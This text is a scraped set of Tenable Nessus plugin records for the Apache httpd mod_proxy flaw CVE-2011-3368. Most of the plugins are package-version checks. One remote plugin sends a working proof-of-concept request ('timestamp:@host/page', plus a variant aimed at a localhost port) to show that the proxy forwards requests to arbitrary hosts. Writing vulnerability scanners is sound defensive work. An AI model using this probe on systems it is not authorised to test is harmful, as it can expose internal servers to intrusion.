Security Advisory ELSA-2011-1392 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68377);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"Oracle Linux 4 / 5 : httpd (ELSA-2011-1392)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1392 :\n\nUpdated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002421.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002422.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"httpd-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-devel-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-manual-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-suexec-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"mod_ssl-2.0.52-49.ent.0.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-53.0.2.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-53.0.2.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-53.0.2.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-53.0.2.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:58:07", "description": "Updated httpd packages that fix one security issue and one bug are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting this issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-21T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 : httpd (RHSA-2011:1392)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-suexec", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/56579", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1392. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56579);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"RHEL 4 / 5 : httpd (RHSA-2011:1392)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3368\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1245.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1392\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1392\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-devel-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-manual-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-suexec-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_ssl-2.0.52-49.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n }\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:50:42", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions.\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : httpd on SL4.x, SL5.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111020_HTTPD_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61160", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61160);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update\n introduced regressions in the way httpd handled certain\n Range HTTP header values. This update corrects those\n regressions.\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1110&L=scientific-linux-errata&T=0&P=2404\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8660505\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"httpd-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-debuginfo-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-devel-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-manual-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-suexec-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"mod_ssl-2.0.52-49.sl4\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-53.sl5.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-16T02:25:53", "description": "The version of Apache HTTP Server running on the remote host is affected by an information disclosure vulnerability. When configured as a reverse proxy, improper use of the RewriteRule and ProxyPassMatch directives could cause the web server to proxy requests to arbitrary hosts. This allows a remote attacker to indirectly send requests to intranet servers.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-29T00:00:00", "type": "nessus", "title": "Apache HTTP Server mod_proxy Reverse Proxy Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-4317"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_MOD_PROXY_INFO_LEAK.NASL", "href": "https://www.tenable.com/plugins/nessus/56972", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56972);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\");\n script_bugtraq_id(49957, 50802);\n script_xref(name:\"EDB-ID\", value:\"17969\");\n\n script_name(english:\"Apache HTTP Server mod_proxy Reverse Proxy Information Disclosure\");\n script_summary(english:\"Make a malformed HTTP request\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The web server running on the remote host has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apache HTTP Server running on the remote host is\naffected by an information disclosure vulnerability. When configured\nas a reverse proxy, improper use of the RewriteRule and ProxyPassMatch\ndirectives could cause the web server to proxy requests to arbitrary\nhosts. This allows a remote attacker to indirectly send requests to\nintranet servers.\"\n );\n # http://mail-archives.apache.org/mod_mbox/httpd-announce/201110.mbox/%3C20111005141541.GA7696%40redhat.com%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7fedbcf7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.qualys.com/blogs/securitylabs/tags/cve-2011-4317\");\n script_set_attribute(attribute:\"see_also\", value:\"http://thread.gmane.org/gmane.comp.apache.devel/46440\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_22.html\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Apache httpd 2.2.22 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/29\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\n# Make sure this looks like Apache unless paranoid\nif (report_paranoia < 2)\n{\n server = http_server_header(port:port);\n\n if ( 'ibm_http_server' >!< tolower(server) && 'apache' >!< tolower(server) && 'oracle http server' >!< tolower(server) && 'oracle-http-server' >!< tolower(server) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like an Apache-based httpd.');\n\n # looks like Apache _httpd_\n if ('apache' >< tolower(server) && ( 'coyote' >< tolower(server) || 'tomcat' >< tolower(server)) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like Apache httpd.');\n}\n\npages = make_list('/');\n\nforeach page (pages)\n{\n # GET 1324:@target-host/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host/page\n # instead of responding with an HTTP 400. this PoC should cover both CVEs\n url = strcat(unixtime(), ':@', get_host_ip(), page);\n res = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n headers = parse_http_headers(status_line:res[0], headers:res[1]);\n http_code = headers['$code'];\n\n # the patched server should always send a 400. just to be on the safe side,\n # we'll explicitly check for a 200 or 404\n if (http_code == 404 || http_code == 200)\n {\n # GET 1324:@target-host:likely-closed-port/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host:likely-closed-port/page\n # instead of responding with an HTTP 400. this PoC should cover both CVEs\n url = strcat(unixtime(), ':@localhost:', (rand() % 535 + 65000), page);\n res = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n headers = parse_http_headers(status_line:res[0], headers:res[1]);\n http_code = headers['$code'];\n\n # the patched server should always send a 400. \n # we'll explicitly check for a 503 (resulting from trying to connect to a closed port)\n if (http_code == 503)\n {\n # this will prevent the other plugin (that checks for the\n # incomplete fix for this CVE) from running\n set_kb_item(name:'/tmp/CVE-2011-3368', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus verified this by sending the following request :\\n\\n' +\n chomp(http_last_sent_request()) + '\\n';\n\n if (report_verbosity > 0)\n {\n report +=\n '\\nWhich resulted in a non-400 response :\\n\\n' +\n res[0] +\n chomp(res[1]) + '\\n';\n }\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n }\n}\nexit(1, 'Unable to determine if the system is vulnerable on port ' + port);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:38:39", "description": "The version of Apache HTTP Server running on the remote host has an information disclosure vulnerability. When configured as a reverse proxy, improper use of the RewriteRule and ProxyPassMatch directives could cause the web server to proxy requests to arbitrary hosts. This could allow a remote attacker to indirectly send requests to intranet servers by making specially crafted HTTP 0.9 requests.\n\nThis vulnerability only affects versions 2.2.x before 2.2.18 that have backported the fix for CVE-2011-3368.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-09T00:00:00", "type": "nessus", "title": "Apache HTTP Server mod_proxy Reverse Proxy HTTP 0.9 Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3639"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_MOD_PROXY_INFO_LEAK2.NASL", "href": "https://www.tenable.com/plugins/nessus/57875", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(57875);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2011-3639\");\n 